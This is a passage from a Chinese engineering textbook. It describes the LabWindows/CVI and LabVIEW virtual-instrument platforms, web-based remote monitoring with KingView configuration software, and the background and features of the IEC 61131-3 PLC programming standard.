Basic与Visual C++、Borland公司的Delphi和C++ Builder等。为了简化用通用编程语言开发虚拟仪器应用软件,NI新推出了Measurement Studio,其中包含了一些面向Visual Basic 和Visual C++的专门用于测控应用的ActiveX,以方便用户采用通用语言开发平台开发虚拟仪器应用软件。 (2)用专业测控语言开发平台进行开发。这又可以分为两种,一种是基于图形化编程语言(Graphics Language),如HP-VEE及NI公司的LabVIEW(Laboratory Virtual Instruments Engineering Workbench)。另一种就是可视化文本编程语言,如NI LabWindows/ CVI(C for Virtual Instruments)。可以把虚拟仪器专用开发软件平台看作是SCADA系统开发中的组态软件。采用虚拟仪器开发软件平台可以加快虚拟仪器开发,提高系统稳定性,仪器界面更加友好。 与通用编程语言相比,虚拟仪器专用开发平台还包括大量通用数据处理软件。通用数据处理软件包括用于数字信号处理的各种功能函数,如频域分析的功率谱估计、FFT、逆FFT和细化分析,时域分析的相关分析、卷积运算、反卷运算、均方根估计、差分积分运算和排序,数字滤波等。这些功能函数为用户进一步扩展虚拟仪器的功能提供了基础。 2.虚拟仪器开发软件LabWindows/CVI 1)LabWindows/CVI的组成、功能及特点 LabWindows/CVI是美国国家仪器公司开发的32位、面向计算机测控领域的软件开发平台。它可以在多种操作系统(如Windows/98/NT/XP,Mac OS和UNIX等)下运行,而且可以在不同的操作系统下保持兼容性。它以ANSI C为核心,将功能强大、使用灵活的C语言与用于数据采集、分析和表达的测控专业工具有机地结合起来。它的集成化开发平台、交互式编程方法、丰富的面板功能和库函数大大增强了C语言的功能,为熟悉C语言的开发人员建立自动检测系统、自动测试环境、数据采集系统和过程监控系统等提供了一个理想的软件开发环境。 LabWindows/CVI将源代码编辑、32位ANSI C编译、连接、调试以及ANSI C库集中在一个交互式开发环境中。因此,用户可以快速方便地编写、调试和修改应用程序,形成的可执行文件可在多种操作系统下运行。其编程采用事件驱动和回调函数方式,编程方法简单易学。LabWindows/CVI建立在开放式软件体系结构之上,以项目文件为主体框架,将C源代码文件、头文件、库文件、目标文件、用户界面文件、动态连接库(DLL)、仪器驱动程序等多功能组件集于一体,并为开发各类测控系统提供了多种函数库支持: (1)为数据采集提供了7个函数库:仪器库,GPIB/GPIB488.2库,数据采集库,DAQ的I/O库,RS232库,VISA和IVI库,VXI库。 (2)为数据分析提供了3个函数库:格式化与I/O库、分析库、可选的高级分析库。 (3)为数据描述提供了用户界面库。 (4)为网络和通信提供了4个函数库:动态数据交换库(DDE)、传输控制协议(TCP /IP)库、DataSoclet库和Active X自动化库。 与一般的可视化软件开发工具(如VC++、DELPHI等)相比,LabWindows/CVI提供了如此众多的面向测控应用的库函数,因此它极大地提高了测控系统软件开发的灵活性、功能和效率。 LabWindows/CVI的开发环境由工程窗口、源文件窗口和用户界面窗口3个部分组成,分别完成对工程文件、各类源代码文件和用户界面文件的管理。LabWindows/CVI对每一个函数都提供一个函数面板,用户可利用这些函数面板进行交互式编程,不仅减少源代码语句的键入量,而且可减少程序语法错误,提高工程设计的效率和可靠性。当应用软件调试完成后,可以使用配给工具(Distribution Kit)将项目文件生成自动安装文件(setup.exe),以方便对项目文件的管理。LabWindows/CVI作为新一代测控软件开发平台,以其功能强大、灵活性好、兼容性强、简单易学等特点而被广泛用于各种测控系统的开发。 2)LabWindows/CVI开发环境介绍 LabWindows/CVI开发环境有以下3个最主要的窗口与函数面板(Function Panel):这3个窗口是项目工程窗口(Project Window)、用户接口编辑窗口(User Interface EditorWindow)和源代码窗口(Source Window)。 (1)项目工程窗口(Project Window) 一个项目工程窗口如图3.27所示。在项目工程窗口中列出了组成该项目工程的所有文件,项目工程窗口中的各菜单项功能如下: · File—创建、保存或打开文件。可以打开项目工程文件(*.Prj)、源代码文件(*.c)、头文件(*.h)以及用户接口文件(*.uir)等。 · Edit—在项目工程中添加或移去文件。 · Build—使用LabWindows/CVI 编译链接器。 · Run—运行一个项目工程。 · Windows—用来访问某个已经打开的窗口,例如:用户接口编辑窗口,源代码窗口。 · Tools—运行向导(wizard)或者已添加到Tools菜单中的一些工具。 · Options—设置LabWindows/CVI 的编程环境。 · Help—LabWindows/CVI 在线帮助及Windows SDK 的函数帮助。 工程项目文件显示了所列文件的状态,其各项的含义如图3.27所示。 图3.27 LabWindows/CVI项目窗口 (2)用户接口编辑窗口(User Interface Editor Window) 图形用户接口编辑窗口是用来创建、编辑GUI的。一个用户接口至少要有一个面板(Panel)以及在面板上的各种控件元素(Control Element)。图形用户接口编辑窗口提供了非常快捷的创建、编辑这些面板和控件元素的方法,可以在短时间里创建出符合要求的图形界面。 (3)源代码窗口(Source Window) 源代码编辑窗口是用来开发C 语言代码文件的。例如,添加、删除、插入函数等编程所需的基本编辑操作。LabWindows/CVI有其独特的简捷快速的开发、编辑工具,可以帮助用户在短时间内完成一个较复杂的C程序代码的开发。一个源代码编辑窗口如图3.28所示。可以看出,LabWindows/CVI的源代码开发环境与其他以C语言为基础的集成开发环境十分相似。 图3.28 LabWindows/CVI GUI编辑窗口 (4)函数面板 在LabWindows/CVI编程环境下,当需要在源程序某处插入函数时,只需从函数所在的库中选择该函数后便会弹出一个与之对应的函数面板,程序开发人员所做的就是填入该函数所需的参数后完成插入即可。如在图3.29所示的nonlnfit.c中,要增加一个非线性曲线拟合的函数,按以下次序Library→Advanced Analysis→Curve Fitting→Non-linear Fit作选择后,图3.30所示的函数面板将自动出现。该函数的功能是根据给定的数据,以给定数据和待拟合曲线偏差的均方根为优化目标函数,进行最优非线性曲线拟合。当然,对熟悉的函数,只需要输入函数名,单击鼠标右键,选择Recall Function Panel,该函数面板也将自动弹出,这样函数输入将更快。在自动生成的函数面板中,函数中的参数也自动产生。函数面板中函数中的参数若是常量的,用鼠标单击工具条中的选择属性或UIR常量按钮后,会弹出一个选择属性或UIR常量对话框,从中选择所需的常量或属性即可;若参数需定义,则可单击鼠标右键,在弹出一窗口后,定义该变量,而无需再切换到源代码编辑窗口编辑该变量。一旦填完函数的参数后,通过单击工具条插入按钮后即可完成函数的插入,而无需再选择菜单中的插入命令。 图3.29 LabWindows/CVI源代码编辑窗口 图3.30 LabWindows/CVI函数面板 除了函数面板外,LabWindows/CVI中还提供了程序源代码自动生成功能,以加快应用程序的开发速度,简化用户开发应用程序的难度。用户在创建好图形面板,定义好与消息对应的回调函数后,可根据需要生成应用程序所有的源代码框架、主函数的源代码和某回调函数的源代码。这样用户开发应用程序,不用考虑复杂的函数接口问题,只需要在自动生成的代码中加入应用所必需的处理过程(代码)。 3.用LabWindows/CVI程序开发数据采集系统步骤 LabWindos/CVI编程的步骤和用可视化编程软件(如Visual Basic、Visual C++等)有很大的相似。首先进行需求分析,确定系统开发要用到的资源和系统要达到的功能;然后开发可视化界面;再进行源代码的生成和编辑修改;最后进行反复调试直到达到设计目标。其具体过程如图3.31所示。 图3.31 用LabWindows/CVI开发测控软件步骤 4.虚拟仪器开发软件LabVIEW LabVIEW是一种基于图形开发、调试和运行程序的集成化环境,应用于数据采集与控制、数据分析以及数据表达等方面。它提供了一种全新的程序编写方法,即对被称之为“虚拟仪器”的软件对象进行图形化的组合操作。作为目前国际上唯一的编译型图形化编程语言,它把复杂、繁琐、费时的语言编程简化成用图标提示的方法选择功能块,并用线条把各种功能块连接起来完成编程。由于它面向普通的工程师而非编程专家,因此LabVIEW一问世就受到全世界各行业工程师的喜爱,已经成为最流行的测控软件开发平台之一。 1)LabVIEW的特点 (1)实现了仪器控制与数据采集的完全图形化编程,设计者无需编写任何文本形式的程序代码。 (2)提供了大量的面向测控领域应用的库函数,如面向数据采集的DAQ板的库函数、内置的GPIB、VXI、串口等数采驱动;面向分析的高级分析库,可进行信号处理、统计、曲线拟合以及复杂的分析工作;面向显示的大量仪器面板,如按钮、滑尺、二维和三维图形等。 (3)提供大量与外部代码或应用软件进行连接的机制,如动态连接库(DLL)、动态数据交换(DDE)、各种ActiveX等。 (4)强大的网络连接功能,支持常用网络协议,方便用户开发各种网络、远程虚拟仪器系统。 (5)适用于多种操作系统,如Windows NT/XP、Mac OS、UNIX及Linux等,并且在任何一个开发平台上开发的LabVIEW应用程序可移植到其他平台。 (6)可生成可执行文件,脱离LabVIEW开发环境运行。此外,内置的编译器可加快执行速度。 2)LabVIEW程序结构模型 所有的LabVIEW程序都被称为虚拟仪器(VI),这是因为程序的外观和操作方式都与诸如示波器、多用表等实物仪器类似。每个LabVIEW程序通过应用库函数来处理用户界面的输入数据或者其他形式的各种输入。LabVIEW基本的程序单位是VI。对于结构简单的测试任务,可以由一个VI来完成;而复杂的程序可以通过VI之间的层次调用结构完成。高层功能的VI可以调用一个或多个低层的特殊功能的VI,各VI之间的层次关系如图3.32所示。可以将VI看成是程序模块,只是它是用图形语言而非文本语言表示。采用这种方式管理、封装和组织程序,有利于程序开发,同时又实现了软件的重用。 图3.32 LabVIEW程序层次模型 VI包括3个部分:程序前面板、框图程序和图标/连接器。程序前面板用于设置输入数值和观察输出量,用于模拟真实仪表的前面板。在程序前面板上,输入量被称为控制(Controls),输出量被称为显示(Indicators)。控制和显示是以各种图标形式出现在前面板上,如旋钮、开关、按钮、图表、图形等,这使得前面板直观易懂。每一个程序前面板都对应着一段框图程序。框图程序用LabVIEW图形编程语言编写,可以把它理解成传统程序的源代码。框图程序由端口、节点、图框和连线构成。其中端口被用来同程序前面板的控制和显示传递数据,节点被用来实现函数和功能调用,图框被用来实现结构化程序控制命令,而连线代表程序执行过程中的数据流,定义了框图内的数据流动方向。图标/连接器是子VI被其他VI调用的接口。图标是子VI在其他程序框图中被调用的节点表现形式;而连接器则表示节点数据的输入/输出口,就像函数的参数。用户必须指定连接器端口与前面板的控制和显示一一对应。连接器一般情况下隐含不显示,除非用户选择打开观察它。 当然,习惯用文本方式编程的用户初次接触LabVIEW开发环境时可能会有些不适应,因为即使是最简单的两数相加,用文本方式只需要很简单的一行代码,而在LabVIEW中,要用3个控件(两个常数控件,一个加操作控件),并用直线按输入和输出进行连接。用LabVIEW编程就像搭积木,LabVIEW中提供了许多基本的“积木”(VI),用户可将这些“积木”根据自己的需要打造自己的“大厦”(VI应用程序)。因此,“大厦”模样和功能受制于工匠的想象能力、设计能力、“积木”的数量和种类等因素。为了增强LabVIEW的功能,NI公司仍在不断地开发新的模块以满足各种应用的要求。当然,若要求开发的测控仪器系统有许多特殊的需求,而这种需求在LabVIEW现有的模板中找不到或很难用现有的模板构建,则非图形编程语言(如LabWindows/CVI)将是更好的选择。 3.7 基于Web的远程数据采集与监控 随着Interner技术、嵌入式控制技术的发展和应用的深入,采用B/S结构的工业生产过程监控应用越来越多。目前许多控制设备,如变频器、PLC、智能模块甚至智能仪表等都嵌入了Web服务器,能够较好的支持各种基于Web的应用和服务。采用基于Web的远程数据采集与监控的好处有两点: (1)扩大了企业信息的使用效率和监控能力。目前多数企业都具有功能较完善的测控系统,但反映现场运行工况的画面、参数和报表大部分只能在本地控制室运行,只有现场操作人员能够了解,无法被企业高层决策者直接利用。因此,通过开发Web功能,企业管理者和技术人员可以通过浏览器随时掌握企业生产情况和设备运行状况,对生产过程进行远程实时监控和管理。 (2)客户端采用标准的浏览器,从而避免了安装和维护客户软件等繁杂工作。任何授权用户都可以通过浏览器来对生产现场进行实时监控。 3.7.1 基于Web的远程数据采集与监控 1.系统架构 基于Web的远程数据采集与监控系统架构如图3.33所示。这是一个分层的系统结构,生产过程的监控系统主要完成对生产过程的实时监控,同时将实时和历史数据存储在数据库中。远程客户通过Internet/Intranet可以观察到工业现场的生产过程运行数据和设备的运行情况,并进行监控和管理。 图3.33 基于Web的远程数据采集与监控系统架构 2.应用方案 目前,基于Web的应用有多种应用方案,主要的不同体现在充当Web服务器的设备上,目前常用的Web服务器设备有嵌入式设备和独立的服务器。嵌入式设备包括具有以太网接口的智能仪表、阀门、PLC等;而独立的服务器主要是计算机。不论哪种形式的Web服务器都要具有独立的IP地址,否则不能成为Interner上的合法节点。 嵌入式Web服务器提供交互式Interner服务,如提供符合HTTP协议的用户远程监控界面信息和信息交互。被监控的各个底层状态变量可以定义成HTML语言可以利用的网络变量,然后利用这些变量生成网页,由网络服务器提供给远程用户。远程用户使用浏览器,下载服务器上的页面,以观察设备的运行状态、改变设备的运行等。 由于嵌入式设备软、硬件资源有限,总体功能较弱,因此其提供的服务较少,且不太灵活,仅适用于一些监控节点数据较少,对实时性要求不太高的场合。 对于测控点比较集中或信息交互量大的远程应用,一般采用具有独立Web服务器的远程监控方案。对于这种应用,独立的Web服务器和数据库可以确保系统可以存储大量的数据,且可以及时地响应客户的请求。Web服务器可以利用CGI、ASP或Java技术形成数据库与服务器之间的接口,访问数据库中的数据,并生成带有这些数据信息的HTML文件。 基于Web的远程数据采集与监控应用系统要特别加强系统安全性,以确保网络中的信息的完整性、保密性和可用性,保证网络设备免遭破坏。在Web服务器、文件服务器、数据库服务器及应用终端中,除了使用在线扫描防病毒软件和防火墙等防范措施外,还应该采取密码等身份认证措施。不过需要注意的是,有些Web服务所需的端口会被防火墙禁止,导致客户端浏览器中可能看不到实时数据或监控画面。 3.7.2 利用组态软件实现数据的远程访问 目前多数组态软件都支持Web应用。这里以组态王为例,说明该功能的使用与配置。 1.组态王网络配置及画面的建立 在组态王的工程浏览器左边窗口双击“网络配置”,在“网络设置”中选择“连网”,本机节点名为该服务器的机器名或该机的IP地址(如果是通过拨号的方式,请用IP地址,不要用机器名)。网络参数的设置如下:如果是局域网的环境,传送速度快,“包大小”可以设4096或更大;如果用Modem互连或连Internet,“包大小”应该设为1024或更小;查询频率最小可以设定为55ms。 网络配置完成后,根据监控要求绘制组态画面。要注意的是,组态王的画面命令语言只有在运行时打开命令语言所依赖的画面才能执行。因此,客户端若需要浏览任何画面,则开发中需要将命令语言全部写入应用程序命令语言,或者运行时打开所有画面,当然,这种方式比较占用系统资源,并不推荐。 为了实现远程访问,需要将要实现远程监控的画面生成为HTML格式的文件。具体方法如下: (1)工程浏览器左边窗口用左键单击“Web”,在窗口的右边双击“新建”图标,选中要发布的画面,并且进行一些设置,如图3.34所示。 (2)在系统配置中的网络配置中组态网络,设置网络服务器的机器为“网络配置”中的本机节点名称。 (3)在“发布路径”中选择预存放生成的HTML文件的路径(可以自动生成该路径),即客户端浏览的路径;同时可以由用户自己指定文件名。 (4)用户也可以修改生成在指定路径下的HTML文件,使得界面符合自己的需要,如替换画面中的图标等。 图3.34 组态王Web发布配置串口 2.远程访问画面 客户端欲进行远程画面监控,需要先在服务器端运行组态王,注意在服务器端不要运行IE浏览发布的文件。客户端只需打开IE浏览器,链接到服务器上存放的发布的HTML文件。 访问方式分为局域网访问和广域网访问两种方式。在局域网中浏览发布的文件可以直接通过文件共享的方式,其前提是要求网络必须用TCP/IP协议连通。 在广域网中浏览发布的文件有3种方式: (1)点对点拨号:运行组态王的机器作为服务器,客户端通过拨号方式连接到服务器。服务器如果是NT系统,需先安装IIS软件。XP操作系统一般都集成了IIS服务。服务器和客户端指定IP地址,并且两个IP地址在同一个网段内,如服务器指定为192.168.10.1,客户端指定为192.168.10.2,客户端通过IP地址(192.168.10.1)访问服务器,即可得到一默认网页,服务器端将该网页内容改为自己在组态王中发布的画面即可。 (2)多台客户端通过拨号同时访问服务器:运行组态王的机器作为服务器通过拨号连接Internet,客户端也通过拨号连接Internet。服务器如果是NT系统,需先安装IIS软件。将服务器端连上Internet之后的动态IP地址告诉客户端,客户端根据该IP地址访问服务器即可得到一默认网页,服务器端将该网页内容改为自己在组态王中发布的画面即可。需要注意的是,服务器端每次拨号得到的动态IP地址是不一样的,第二次拨号后,服务器端应与客户端取得联系。 (3)通过ISP服务商:运行组态王的机器应连接Internet,将发布后生成的文件Netkingview、*.html和*.ini上传至ISP服务商处,可以在ISP服务商处申请域名,客户端通过域名访问,也可以不申请域名,客户端直接通过ISP服务商提供的IP地址访问。使用域名的方式对外比较直观,不使用域名可以节省域名费用,另外速度会更快。需要注意的是,运行组态王的机器与Internet应始终保持连接,如果断开,需要将生成的文件重新上传至ISP服务商处。 第4章 工业控制编程语言标准及基于PC的控制技术 4.1 IEC 61131-3标准的产生与特点 4.1.1 传统的PLC编程语言的不足 由于PLC的I/O点数可以从十几点到几千甚至上万点,因此其应用范围极广,大量用于从小型设备到大型系统的控制,是用量最大的一类控制器设备,众多的厂家生产各种类型的PLC产品或为之配套。由于大量的厂商在PLC的生产、开发上各自为战,造成PLC产品从软件到硬件的兼容性很差。在编程语言上,从低端产品到高端产品都支持的就是梯形图,它虽然遵从了广大电气自动化人员的专业习惯,具有易学易用等特点,但也存在许多难以克服的缺点。虽然一些中、高端的PLC还支持其他一些编程语言,但总体上来讲,传统的以梯形图为代表的PLC编程语言存在许多不足之处,主要表现在以下方面: (1)梯形图语言规范不一致。虽然不同厂商的PLC产品都可采用梯形图编程,但各自的梯形图符号和编程规则均不一致,各自的梯形图指令数量及表达方式相差较大。 (2)程序可复用性差。为了减少重复劳动,现代软件工程特别强调程序的可重复使用性,而传统的梯形图程序很难通过调用子程序实现相同的逻辑算法和策略的重复使用,更不用说同样的功能块在不同的PLC之间使用。 (3)缺乏足够的程序封装能力。一般要求将一个复杂的程序分解为若干个不同功能的程序模块。或者说,人们在编程时希望用不同的功能模块组合成一个复杂的程序,但梯形图编程难以实现程序模块之间具有清晰接口的模块化,也难以对外部隐藏程序模块的内部数据从而实现程序模块的封装。 (4)不支持数据结构。梯形图编程不支持数据结构,无法实现将数据组织成如Pascal、C语言等高级语言中的数据结构那样的数据类型。对于一些复杂控制应用的编程,它几乎无能为力。 (5)程序执行具有局限性。由于传统PLC按扫描方式组织程序的执行,因此整个程序的指令代码完全按顺序逐条执行。这对于要求即时响应的控制应用(如执行事件驱动的程序模块),具有很大的局限性。 (6)对顺序控制功能的编程,只能为每一个顺控状态定义一个状态位,因此难以实现选择或并行等复杂顺控操作。 (的支持。 由于传统编程语言的不足,影响了PLC技术的应用和发展,非常有必要制定一个新的控制系统编程语言国际标准。 4.1.2 IEC 61131-3标准的产生 IEC英文全称是International Electro-technical Commission,中文名称是国际电工技术委员会。IEC成立于1906年,是世界上最早的国际性电工标准化机构,总部设在瑞士日内瓦,负责有关电工、电子领域的国际标准化工作。IEC 61131-3是IEC 61131国际标准的第三部分,是第一个为工业自动化控制系统的软件设计提供标准化编程语言的国际标准。该标准得到了世界范围的众多厂商的支持,但又独立于任何一家公司。该国际标准的制定,是IEC工作组在合理地吸收、借鉴世界范围的各PLC厂家的技术和编程语言等的基础之上,形成的一套编程语言国际标准。 IEC 61131-3国际标准得到了包括美国罗克韦尔自动化公司、德国西门子公司等世界知名大公司在内的众多厂家的共同推动和支持,它极大地提高了工业控制系统的编程软件质量,从而也提高了采用符合该规范的编程软件编写的应用软件的可靠性、可重用性和可读性,提高了应用软件的开发效率。它定义的一系列图形化编程语言和文本编程语言,不仅对系统集成商和系统工程师的编程带来很大的方便,而且对最终用户同样也带来很大的好处。它在技术上的实现是高水平的,有足够的发展空间和变动余地,能很好地适应未来的进一步发展。IEC 61131-3标准最初主要用于可编程序控制器的编程系统,但由于其显著的优点,目前在过程控制、运动控制、基于PC的控制和SCADA系统等领域也得到越来越多的应用。总之,IEC 61131-3国际标准的推出,创造了一个控制系统的软件制造商、硬件制造商、系统集成商和最终用户等多赢的结局。 IEC 61131标准共由9部分组成,它是可编程控制器的国际标准。我国等同采用了该标准,发布了GB/T15963国家推荐标准,如GB/T15963.3对应IEC 61131-3。 (1)IEC 61131-1 通用信息(2003):定义可编程控制器及其外围设备,例如编程和调试工具PADT、人机界面HMI等的有关术语。 (2)IEC 61131-2 设备特性(2007):规定适用于可编程控制器及有关外围设备的工作条件、结构特性、安全性及试验的一般要求、试验方法和步骤等。 (3)IEC 61131-3 编程语言(2013):规定可编程控制器编程语言的语法和语义,规定编程语言有文本语言和图形语言,并描述了可编程控制器与第一部分规定的程序登录、测试、监视和操作系统的功能。 (4)IEC 61131-4 用户导则(2004):为从事自动化项目各阶段的用户提供可编程控制器系统应用中除第8部分外的其他方面的参考。例如系统分析、装置选择、系统维护等。 (5)IEC 61131-5 通信(2000):规定可编程控制器的通信范围。包括任何设备与作为服务器的PLC通信、PLC与任何设备的通信、PLC为其他设备提供服务和PLC应用程序向其他设备请求服务时PLC的行为特性等。 (6)IEC 61131-6 功能安全(2012):为可编程控制器及其外围设备用于E/E/PE安全相关系统制定的规范。满足这些规范的可编程控制器可称为功能安全可编程控制器(FS-PLC)。 (7)IEC 61131-7 模糊控制编程(2000):根据第3部分编程语言,将它与模糊控制的应用结合,为制造商和用户提供基本意义的综合理解,提供不同编程系统间交换可移植模糊控制程序的可能性。 (8)IEC 61131-8 编程语言应用和实现导则(2001):为实现在可编程控制器系统及其程序支持的环境下编程语言的应用提供导则,为可编程控制器系统应用提供编程、组态、安装和维护指南。 (9)IEC 61131-9用于小型传感器和执行器的单点(single-drop)数字通信接口规范(2013):可把IEC 61131-2标准中定义的传统数字输入和输出扩展到点对点的通信链接。 在这9个部分中,IEC 61131-3是IEC 61131标准中最重要、最具代表性的部分。IEC 61131-3国际标准是下一代PLC的基础。IEC 61131-5是IEC 61131的通信部分,通过IEC 61131-5可以实现可编程控制器与其他工业控制系统,如机器人、数控系统和现场总线等的通信。 IEC 61131-3的制定背景是:PLC在标准的制定过程中正处在其发展和推广应用的鼎盛时期,而编程语言越来越成其进一步发展和应用的瓶颈之一;另一方面,PLC编程语言的使用具有一定的地域特性:在北美和日本,普遍运用梯形图语言编程;在欧洲,则使用功能块图和顺序功能图编程;在德国和日本,又常常采用指令表对PLC进行编程。为了扩展PLC的功能,特别是加强它的数据与文字处理以及通信能力,许多PLC还允许使用高级语言(如BASIC、C)编程。同时,计算机技术特别是软件工程领域有了许多重要成果。因此,在制定标准时就要做到兼容并蓄,既要考虑历史的传承,又要把现代软件的概念和现代软件工程的机制应用于新标准中。IEC 61131-3规定了两大类编程语言:文本化编程语言和图形化编程语言。前者包括指令表(Instruction List,IL)语言和结构化文本语言(Structured Text,ST),后者包括梯形图语言(Ladder Diagram,LD)和功能块图(Function Block Diagram,FBD)语言。至于顺序功能图(Sequential Function Chart,SFC),该标准未把它单独列为编程语言的一种,而是将它在公用元素中予以规范。这就是说,不论在文本化语言,或者在图形化语言,都可以运用SFC的概念、句法和语法。于是,在现在所使用的编程语言中,可以在梯形图语言中使用SFC,也可以在指令表语言中使用SFC。 自IEC 61131-3正式公布后,它获得了广泛的接受和支持。首先,国际上各大PLC厂商都宣布其产品符合该标准,在推出其编程软件新产品时,遵循该标准的各种规定。其次,许多稍晚推出的DCS产品,或者DCS的更新换代产品,也遵照IEC 61131-3的规范,提供DCS的编程语言,而不像以前每个DCS厂商都搞自己的一套编程软件产品。再次,以PC为基础的控制作为一种新兴控制技术正在迅速发展,大多数基于PC的控制软件开发商都按照IEC 61131-3的编程语言标准规范其软件产品的特性。最后,正因为有了IEC 61131-3,才真正出现了一种开放式的可编程控制器的编程软件包,它不具体地依赖于特定的PLC硬件产品,这就为PLC的程序在不同机型之间的移植提供了可能。 标准的出台对PLC制造商、集成商和终端用户都有许多益处。技术人员不再为某一种PLC的特定语言花费大量的时间学习培训,也减少对语言本身的误解;对于相同的控制逻辑,不管控制设备如何,只需相同的程序代码,为一种PLC家族开发的软件,理论上可以运行在任何兼容IEC 61131的系统上;用户可以集中精力于具体问题的解决,消除了对单一生产商的依赖。当系统硬件或软件功能需要升级时,用户不再担心以往的投资,可以选用对特定应用更好的工具;PLC厂商提供了符合IEC 61131-3标准的编程语言后,不再需要组织专门的语言培训,只需将注意力集中到PLC自身功能的改进和提高上,也不用花费时间精力和财力考虑与其他PLC的编程兼容问题。迄今为止,IEC 61131-3标准已经被大多数PLC自动化设备制造商所接受,并对PLC的体系结构产生了巨大影响;另外,越来越多的DCS制造商也开始考虑采用IEC 61131-3的编程标准对分散过程控制进行编程组态,IEC 61131-3已经成为自动控制领域的一种通用编程标准。 当然,需要说明的是,虽然许多PLC制造商都宣称其产品支持IEC 61131-3标准,但应该看到,这种支持只是部分的,特别是对于一些低端的PLC产品,这种支持就更弱了。因此,IEC 61131-3标准的推广还有许多工作要做。 4.1.3 IEC 61131-3标准的特点 IEC 61131-3允许在同一个PLC中使用多种编程语言,允许程序开发人员对每个特定的任务选择最合适的编程语言,还允许在同一个控制程序中不同的软件模块用不同的编程语言编制,以充分发挥不同编程语言的应用特点。标准中的多语言包容性很好地正视了PLC发展历史中形成的编程语言多样化的现实,为PLC软件技术的进一步发展提供了足够的技术空间和自由度。 IEC 61131-3的优势还在于它成功地将现代软件的概念和现代软件工程的机制和成果用于PLC传统的编程语言。IEC 61131-3的优势具体表现在以下几方面。 (1)采用现代软件模块化原则,主要内容包括: · 编程语言支持模块化,将常用的程序功能划分为若干单元,并加以封装,构成编程的基础。 · 模块化时,只设置必要的、尽可能少的输入和输出参数,尽量减少交互作用和内部数据交换。 · 模块化接口之间的交互作用均采用显性定义。 · 将信息隐藏于模块内,对使用者来讲只需了解该模块的外部特性(即功能、输入和输出参数),而无须了解模块内算法的具体实现方法。 (2)IEC 61131-3支持自顶而下(Top Down)和自底而上(Bottom Up)的程序开发方法。自顶而下的开发过程是用户首先进行系统总体设计,将控制任务划分为若干个模块,然后定义变量和进行模块设计,编写各个模块的程序;自底而上的开发过程是用户先从底部开始编程,例如先导出函数和功能块,再按照控制要求编制程序。无论选择何种开发方法,IEC 61131-3所创建的开发环境均会在整个编程过程中给予强有力的支持。 (3)IEC 61131-3所规范的编程系统独立于任一个具体的目标系统,它可以最大限度地在不同的PLC目标系统中运行。这样不仅创造了一种具有良好开放性的氛围,奠定了PLC编程开放性的基础,而且可以有效规避标准与具体目标系统关联而引起的利益纠葛,体现标准的公正性。 (4)将现代软件概念浓缩,并加以运用。例如:数据使用DATA_TYPE声明机制;功能(函数)使用FUNCTION声明机制;数据和功能的组合使用FUNCTION _BLOCK声明机制。 在IEC 61131-3中,功能块并不只是FBD语言的编程机制,它还是面向对象组件的结构基础。一旦完成了某个功能块的编程,并通过调试和验证证明了它确能正确执行所规定的功能,那么,就不允许用户再将它打开,改变其算法。即使一个功能块因为其执行效率有必要再提高,或者在一定的条件下其功能执行的正确性存在问题,需要重新编程,只要保持该功能块的外部接口(输入/输出定义)不变,仍可照常使用。同时,许多原始设备制造厂(OEM)将他们的专有控制技术压缩在用户自定义的功能块中,既可以保护知识产权,又可以反复使用,不必为同一个目的而反复编写和调试程序。 (5)完善的数据类型定义和运算限制。软件工程师很早就认识到许多编程的错误往往发生在程序的不同部分,其数据的表达和处理不同。IEC 61131-3从源头上注意防止这类低级的错误,虽然采用的方法可能导致效率降低一点,但换来的价值却是程序的可靠性、可读性和可维护性。IEC 61131-3采用以下方法防止如下错误: · 限制功能与功能块之间互联的范围,只允许兼容的数据类型与功能块之间的互联。 · 限制运算,只可在其数据类型已明确定义的变量上进行。 · 禁止隐含的数据类型变换。比如,实型数不可执行按位运算。若要运算,编程者必须先通过显式变换函数REAL-TO-WORD,把实型数变换为WORD型位串变量。标准中规定了多种标准固定字长的数据类型,包括位串、带符号位和不带符号位的整数型(8、16、32和64位字长)。 (6)对程序执行具有完全的控制能力。传统的PLC只能按扫描方式顺序执行程序,对程序执行的其他要求,如由事件驱动某一段程序的执行、程序的并行处理等均无能为力。IEC 61131-3允许程序的不同部分、在不同的条件(包括时间条件)下、以不同的比率并行执行。 (7)结构化编程。对于循环执行的程序、中断执行的程序、初始化执行的程序等可以分开设计。此外,循环执行的程序还可以根据执行的周期分开设计。 虽然IEC 61131-3的标准借鉴和吸收了控制技术、软件工程和计算机技术的许多发展成果和历史经验,但它还存在一些不足,这是因为它在体系结构和硬件上依赖于传统的PLC,具体表现在以下两方面: (1)IEC 61131-3沿用了直接表示与硬件有关的变量的方法,这就妨碍了均符合标准的PLC系统之间做到真正意义上的程序可移植。由于不同机种有各自与硬件紧密相关的不同的输入、输出的定义,(例如对于内部寄存器变量,在三菱电机PLC中用M#表示,#是依赖于PLC型号的一定范围内的整数;而西门子S7系列PLC用M#.×表示,其中#是依赖于PLC型号的一定范围内的整数,而×是0~7中的任意数),如果想把一个在某个厂商的PLC中运行得很好的程序原封不动地搬到另一个PLC厂商的机器上,必须先从技术文件中找到有关与硬件相关变量的定义,然后再在另一个机型中对此重新定义。 (2)IEC 61131-3只给出一个单一的集中PLC系统的配置机制,这显然不能适应分布式结构的软件要求。由于工业通信技术的飞速发展,特别是现场总线和以太网在工业中的实际应用,引起了工业自动化体系结构的显著变化,其中一个重要的趋势就是多PLC控制系统的联网以实现控制的分散化,因此,IEC 61131-3必须适应客观形势的发展,在这方面进行突破。它应该允许功能块不一定集中常驻在单个硬件中,允许分散于不同硬件中,通过通信方式可以构成一个控制程序。这就正是正处于制定中的IEC 61499的主攻方向之一。 IEC 61499标准是IEC 61131标准的进一步发展。它是一个功能块的通用模型的标准,工程师可以比较容易地使用标准模块建立自己的系统,而无须了解模块中的具体算法、结构及其实现。 4.2 IEC 61131-3的基本内容 IEC 61131-3标准分为两个部分:公共元素和编程语言,如图4.1所示。 公共元素部分规范了数据类型定义与变量,给出了软件模型及其元素,并引入配置(Configuration)、资源(Resources)、任务(Tasks)和程序(Program)的概念,还规范了程序组织单元(程序、功能、功能块)和顺序功能图。 4.2.1 语言元素 每个PLC程序可以作是各种语言元素的集合。IEC 61131-3标准为编程语言提供语言元素,例如,分界符、关键字、直接量和标识符。语言元素示例如表4.1所示。 图4.1 IEC 61131-3标准的层次与结构 表4.1 语言元素示例 1.分界符 分界符(Delimiter)用于分隔程序语言元素的字符或字符组合。它是专用字符,不同分界符具有不同的含义。表4.2所示为各种分界符及其应用场合。 表4.2 分界符及其应用场合 续表 2.关键字 关键字(keyword)是语言元素特征化的词法单元。关键字是标准标志符。在IEC 61131-3标准中,关键字是结构声明和语句的固定符号表示法,其拼写和含义均由IEC 